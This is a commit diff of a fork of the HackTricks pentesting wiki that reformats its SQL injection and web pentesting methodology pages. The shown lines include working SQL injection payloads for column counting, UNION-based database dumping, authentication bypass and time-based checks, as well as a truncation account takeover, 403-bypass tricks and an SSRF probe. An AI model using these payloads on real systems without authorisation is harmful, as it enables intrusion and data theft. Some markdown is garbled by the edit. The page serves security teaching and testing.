coelner/hacktricks
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

GitBook: [master] 2 pages modified

Browse Source
This commit is contained in:
CPol 2021-02-10 15:13:06 +00:00 committed by gitbook-bot
parent 0189833646
commit f3258e6ecb
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
2 changed files with 35 additions and 37 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

36
pentesting-web/sql-injection/README.md
View File

@ -138,8 +138,6 @@ The best way to identify the back-end is trying to execute functions of the diff
Also, if you have access to the output of the query, you could make it **print the version of the database**.
{% hint style="info" %}
A continuation we are going to discuss different methods to exploit different kinds of SQL Injection. We will use MySQL as example.
{% endhint %}
@ -157,19 +155,19 @@ Two methods are typically used for this purpose:
Keep incrementing the number until you get a False response. Even though GROUP BY and ORDER BY have different functionality in SQL, they both can be used in the exact same fashion to determine the number of columns in the query.
```text
1' ORDER BY 1--+ #True
1' ORDER BY 2--+ #True
1' ORDER BY 3--+ #True
1' ORDER BY 4--+ #False - Query is only using 3 columns
#-1' UNION SELECT 1,2,3--+ True
1' ORDER BY 1--+ #True
1' ORDER BY 2--+ #True
1' ORDER BY 3--+ #True
1' ORDER BY 4--+ #False - Query is only using 3 columns
#-1' UNION SELECT 1,2,3--+ True
```
```text
1' GROUP BY 1--+ #True
1' GROUP BY 2--+ #True
1' GROUP BY 3--+ #True
1' GROUP BY 4--+ #False - Query is only using 3 columns
#-1' UNION SELECT 1,2,3--+ True
1' GROUP BY 1--+ #True
1' GROUP BY 2--+ #True
1' GROUP BY 3--+ #True
1' GROUP BY 4--+ #False - Query is only using 3 columns
#-1' UNION SELECT 1,2,3--+ True
```
#### UNION SELECT
@ -199,9 +197,9 @@ On the next examples we are going to retrieve the name of all the databases, the
-1' UniOn Select 1,2,3,gRoUp_cOncaT(0x7c,column_name,0x7C) fRoM information_schema.columns wHeRe table_name=[table name]
```
_There is a different way to discover this data on every different database, but it's always the same methodology._
_There is a different way to discover this data on every different database, but it's always the same methodology._
## Exploiting Error based
## Exploiting Error based
If for some reason you **cannot** see the **output** of the **query** but you can **see the error messages**, you can make this error messages to **ex-filtrate** data from the database.
Following a similar flow as in the Union Based exploitation you could manage to dump the DB.
@ -264,7 +262,7 @@ Or you will find **a lot of tricks regarding: MySQL, PostgreSQL, Oracle, MSSQL,
## Authentication bypass
**Small list recommended**:
**Small list recommended**:
{% file src="../../.gitbook/assets/sqli-authbypass-small.txt" %}
@ -296,7 +294,7 @@ Challenge demo available at [http://web.jarvisoj.com:32772](http://web.jarvisoj.
admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'
```
**Recomended list**:
**Recomended list**:
You should use as username each line of the list and as password always: _**Pass1234.**_
@ -343,13 +341,13 @@ To do so you should try to **create a new object named as the "master object"**
If the database is vulnerable and the max number of chars for username is for example 30 and you want to impersonate the user **admin**, try to create a username called: "_admin \[30 spaces\] a_" and any password.
The database will **check** if the introduced **username** **exists** inside the database. If **not**, it will **cut** the **username** to the **max allowed number of characters** \(in this case to: "_admin \[25 spaces\]_"\) and the it will **automatically remove all the spaces at the end updating** inside the database the user "**admin**" with the **new password** \(some error could appear but it doesn't means that this hasn't worked\).
The database will **check** if the introduced **username** **exists** inside the database. If **not**, it will **cut** the **username** to the **max allowed number of characters** \(in this case to: "_admin \[25 spaces\]_"\) and the it will **automatically remove all the spaces at the end updating** inside the database the user "**admin**" with the **new password** \(some error could appear but it doesn't means that this hasn't worked\).
More info: [https://blog.lucideus.com/2018/03/sql-truncation-attack-2018-lucideus.html](https://blog.lucideus.com/2018/03/sql-truncation-attack-2018-lucideus.html) & [https://resources.infosecinstitute.com/sql-truncation-attack/\#gref](https://resources.infosecinstitute.com/sql-truncation-attack/#gref)
### MySQL Insert time based checking
Add as much `','',''` as you consider to exit the VALUES statement. If delay is executed, you have a SQLInjection.
Add as much `','',''` as you consider to exit the VALUES statement. If delay is executed, you have a SQLInjection.
```text
name=','');WAITFOR%20DELAY%20'0:0:5'--%20-
@ -476,7 +474,7 @@ WHERE -> HAVING --> LIMIT X,1 -> group_concat(CASE(table_schema)When(database())
### WAF bypass suggester tools
{% embed url="https://github.com/m4ll0k/Atlas" %}
{% embed url="https://github.com/m4ll0k/Atlas" caption="" %}
## Other GUIDES

36
pentesting/pentesting-web/README.md
View File

@ -1,8 +1,8 @@
# 80,443 - Pentesting Web Methodology
If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, ****join the [💬](https://emojipedia.org/speech-balloon/) ****[**PEASS & HackTricks telegram group here**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
If you want to **share some tricks with the community** you can also submit **pull requests** to ****[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) ****that will be reflected in this book.
Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/) ****[**PEASS & HackTricks telegram group here**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
If you want to **share some tricks with the community** you can also submit **pull requests** to [https://github.com/carlospolop/hacktricks](https://github.com/carlospolop/hacktricks**]%28https://github.com/carlospolop/hacktricks) **that will be reflected in this book.
Don't forget to** give ⭐ on the github to motivate me to continue developing this book.
## Basic Info
@ -58,7 +58,7 @@ whatweb -a 3 <URL> #Aggresive
webtech -u <URL>
```
Search ****for ****[**vulnerabilities of the web application** **version**](../../search-exploits.md)\*\*\*\*
Search **for** [**vulnerabilities of the web application** **version**](../../search-exploits.md)\*\*\*\*
**Check if any WAF**
@ -73,7 +73,7 @@ Also, the [**flags of the cookies**](../../pentesting-web/hacking-with-cookies.m
### Web tech tricks
Some **tricks** for **finding vulnerabilities** in different well known **technologies** being used:
Some **tricks** for **finding vulnerabilities** in different well known **technologies** being used:
* [**IIS tricks**](iis-internet-information-services.md)\*\*\*\*
* [**PHP \(php has a lot of interesting tricks that could be exploited\)**](php-tricks-esp/)\*\*\*\*
@ -184,13 +184,13 @@ Information about SSL/TLS vulnerabilities:
Launch some kind of **spider** inside the web. The goal of the spider is to **find as much paths as possible** from the tested application. Therefore, web crawling and external sources should be used to find as much valid paths as possible.
* [**gospider**](https://github.com/jaeles-project/gospider) ****\(go\): ****HTML spider, LinkFinder in JS files and external sources \(Archive.org, CommonCrawl.org, VirusTotal.com, AlienVault.com\).
* [**hakrawler**](https://github.com/hakluke/hakrawler) ****\(go\): HML spider, with LinkFider for JS files and Archive.org as external source.
* [**dirhunt**](https://github.com/Nekmo/dirhunt) ****\(python\): HTML spider, also indicates "juicy files".
* [**gospider**](https://github.com/jaeles-project/gospider) **\(go\):** HTML spider, LinkFinder in JS files and external sources \(Archive.org, CommonCrawl.org, VirusTotal.com, AlienVault.com\).
* [**hakrawler**](https://github.com/hakluke/hakrawler) _\*\*_\(go\): HML spider, with LinkFider for JS files and Archive.org as external source.
* [**dirhunt**](https://github.com/Nekmo/dirhunt) _\*\*_\(python\): HTML spider, also indicates "juicy files".
* [**evine** ](https://github.com/saeeddhqan/evine)\(go\): Interactive CLI HTML spider. It also searches in Archive.org
* \*\*\*\*[**meg**](https://github.com/tomnomnom/meg) \(go\): This tool isn't a spider but it can be useful. You can just indicate a file with hosts and a file with paths and meg will fetch each path on each host and save the response.
* \*\*\*\*[**urlgrab**](https://github.com/IAmStoxe/urlgrab) \(go\): HTML spider with JS rendering capabilities. However, it looks like it's unmaintained, the precompiled version is old and the current code doesn't compile
* [**gau**](https://github.com/lc/gau) ****\(go\): HTML spider that uses external providers \(wayback, otx, commoncrawl\)
* [**gau**](https://github.com/lc/gau) _\*\*_\(go\): HTML spider that uses external providers \(wayback, otx, commoncrawl\)
* [**ParamSpider**](https://github.com/devanshbatham/ParamSpider): This script will find URLs with parameter and will list them.
* \*\*\*\*[**galer**](https://github.com/dwisiswant0/galer) \(go\): HTML spider with JS rendering capabilities.
@ -200,7 +200,7 @@ Start **brute-forcing** from the root folder and be sure to brute-force **all**
Tools:
* **Dirb** / **Dirbuster** - Included in Kali, **old** \(and **slow**\) but functional. Allow auto-signed certificates and recursive search. Too slow compared with th other options.
* [**Dirsearch**](https://github.com/maurosoria/dirsearch) ****\(python\): It doesn't allow auto-signed certificates but **allows recursive** search.
* [**Dirsearch**](https://github.com/maurosoria/dirsearch) **\*\*\(python\): It doesn't allow auto-signed certificates but** allows recursive\*\* search.
* [**Gobuster**](https://github.com/OJ/gobuster) \(go\): It allows auto-signed certificates, it **doesn't** have **recursive** search.
* [**Feroxbuster**](https://github.com/epi052/feroxbuster) **- Fast, supports recursive search.**
* [**wfuzz**](https://github.com/xmendez/wfuzz) `wfuzz -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt https://domain.com/api/FUZZ`
@ -210,7 +210,7 @@ Tools:
* \*\*\*\*[https://github.com/danielmiessler/RobotsDisallowed](https://github.com/danielmiessler/RobotsDisallowed) \(Very interesting\)
* [**Seclists**](https://github.com/danielmiessler/SecLists)
* [**Dirsearch**](https://github.com/maurosoria/dirsearch) ****included dictionary
* [**Dirsearch**](https://github.com/maurosoria/dirsearch) _\*\*_included dictionary
* [http://gist.github.com/jhaddix/b80ea67d85c13206125806f0828f4d10](http://gist.github.com/jhaddix/b80ea67d85c13206125806f0828f4d10)
* [Assetnote wordlists](https://wordlists.assetnote.io/)
* _/usr/share/wordlists/dirb/common.txt_
@ -223,10 +223,10 @@ _Note that anytime a new directory is discovered during brute-forcing or spideri
* \*\*\*\*[**Broken link checker**](https://github.com/stevenvachon/broken-link-checker): Find broken links inside HTMLs that may be prone to takeovers
* **File Backups**: Once you have found all the files, look for backups of all the executable files \("_.php_", "_.aspx_"...\). Common variations for naming a backup are: _file.ext~, \#file.ext\#, ~file.ext, file.ext.bak, file.ext.tmp, file.ext.old, file.bak, file.tmp and file.old_
* **Discover new parameters**: You can use tools like ****[**Arjun**](https://github.com/s0md3v/Arjun) **and** [**Parameth**](https://github.com/maK-/parameth) to discover hidden parameters. If you can, you could try to search **hidden parameters** on each executable web file.
* **Discover new parameters**: You can use tools like **\*\*\[**Arjun**\]\(**[https://github.com/s0md3v/Arjun](https://github.com/s0md3v/Arjun)**\)** and **\[**Parameth**\]\(**[https://github.com/maK-/parameth](https://github.com/maK-/parameth)**\) to discover hidden parameters. If you can, you could try to search** hidden parameters\*\* on each executable web file.
* **Comments:** Check the comments of all the files, you can find **credentials** or **hidden functionality**.
* If you are playing **CTF**, a "common" trick is to **hide** **information** inside comments at the **right** of the **page** \(using **hundreds** of **spaces** so you don't see the data if you open the source code with the browser\). Other possibility is to use **several new lines** and **hide information** in a comment at the **bottom** of the web page.
* **API keys**: If you **find any API key** there is guide that indicates how to use API keys of different platforms: ****[**keyhacks**](https://github.com/streaak/keyhacks)**,** [**zile**](https://github.com/xyele/zile.git)**,** [**truffleHog**](https://github.com/dxa4481/truffleHog/)**,** [**SecretFinder**](https://github.com/m4ll0k/SecretFinder)**,** [**RegHex**](https://github.com/l4yton/RegHex)\*\*\*\*
* **API keys**: If you **find any API key** there is guide that indicates how to use API keys of different platforms: **\*\*\[**keyhacks**\]\(**[https://github.com/streaak/keyhacks](https://github.com/streaak/keyhacks)**\)**, **\[**zile**\]\(**[https://github.com/xyele/zile.git](https://github.com/xyele/zile.git)**\)**, **\[**truffleHog**\]\(**[https://github.com/dxa4481/truffleHog/](https://github.com/dxa4481/truffleHog/)**\)**, **\[**SecretFinder**\]\(**[https://github.com/m4ll0k/SecretFinder](https://github.com/m4ll0k/SecretFinder)**\)**, **\[**RegHex_\*\]\(_[https://github.com/l4yton/RegHex\)\](https://github.com/l4yton/RegHex%29\)\*\*\*
* **S3 Buckets**: While spidering look if any **subdomain** or any **link** is related with some **S3 bucket**. In that case, [**check** the **permissions** of the bucket](buckets/).
### Special findings
@ -246,7 +246,7 @@ It could be also very useful to **parse** the **JS files** in order to search fo
Another interesting approach could be **monitoring the JS files** with a tool like [**JSMon**](https://github.com/robre/jsmon) that checks for changes.
You should also **check** if the application is using any **outdated** and **vulnerable javascript library** with: [**RetireJS**](https://github.com/retirejs/retire.js/)\*\*\*\*
If the **javascript** code is **obfuscated**, these tools could be useful:
If the **javascript** code is **obfuscated**, these tools could be useful:
* **Javascript Deobfuscator and Unpacker** \([https://lelinhtinh.github.io/de4js/](https://lelinhtinh.github.io/de4js/)\)
* **Javascript Beautifier** \([http://jsbeautifier.org/](https://beautifier.io/)\)
@ -257,7 +257,7 @@ In several occasions you will need to **understand regular expressions** used, t
#### 403 Forbidden/Basic Authentication/401 Unauthorized \(bypass\)
* Try using **different verbs** to access the file: _GET, POST, INVENTED_
* If _/path_ is blocked, try using _**/**_**%2e/**path __\(if the access is blocked by a proxy, this could bypass the protection\). Try also _/**%252e**/path_ \(double URL encode\)
* If _/path_ is blocked, try using _**/**_**%2e/**path _\_\(if the access is blocked by a proxy, this could bypass the protection\). Try also_ /**%252e**/path\_ \(double URL encode\)
* Try Unicode bypass: _/**%ef%bc%8f**path_ \(The URL encoded chars are like "/"\) so when encoded back it will be _//path_ and maybe you will have already bypassed the _/path_ name check
* Try to **stress the server** sending common GET requests \([It worked for this guy wit Facebook](https://medium.com/@amineaboud/story-of-a-weird-vulnerability-i-found-on-facebook-fc0875eb5125)\).
* **Change the protocol**: from http to https, or for https to http
@ -308,13 +308,13 @@ In several occasions you will need to **understand regular expressions** used, t
#### 502 Proxy Error
If any page **responds** with that **code**, it's probably a **bad configured proxy**. ****If you send a HTTP request like: `GET https://google.com HTTP/1.1` \(with the host header and other common headers\), the **proxy** will try to **access** _**google.com**_ and you will have found a **SSRF**.
If any page **responds** with that **code**, it's probably a **bad configured proxy**. **\*\*If you send a HTTP request like: `GET https://google.com HTTP/1.1` \(with the host header and other common headers\), the** proxy **will try to** access **\_**google.com**\_ and you will have found a** SSRF\*\*.
#### **NTLM Authentication - Info disclosure**
If the running server asking for authentication is **Windows** or you find a login asking for your **credentials** \(and asking for **domain** **name**\), you can provoke an **information disclosure**.
**Send** the **header**: `“Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=”` and due to how the **NTLM authentication works**, the server will respond with internal info \(IIS version, Windows version...\) inside the header "WWW-Authenticate".
You can **automate** this using the **nmap plugin** "_http-ntlm-info.nse_".
You can **automate** this using the **nmap plugin** "_http-ntlm-info.nse_".
#### HTTP Redirect \(CTF\)
@ -345,7 +345,7 @@ You should also check for:
### Insert into/Create Object
Check for ****[**SQL INSERT INTO Injections.**](../../pentesting-web/sql-injection/#insert-statement)\*\*\*\*
Check for **\*\*\[**SQL INSERT INTO Injections._\*\]\(../../pentesting-web/sql-injection/\#insert-statement\)\_\*\*\*
### **Upload Files**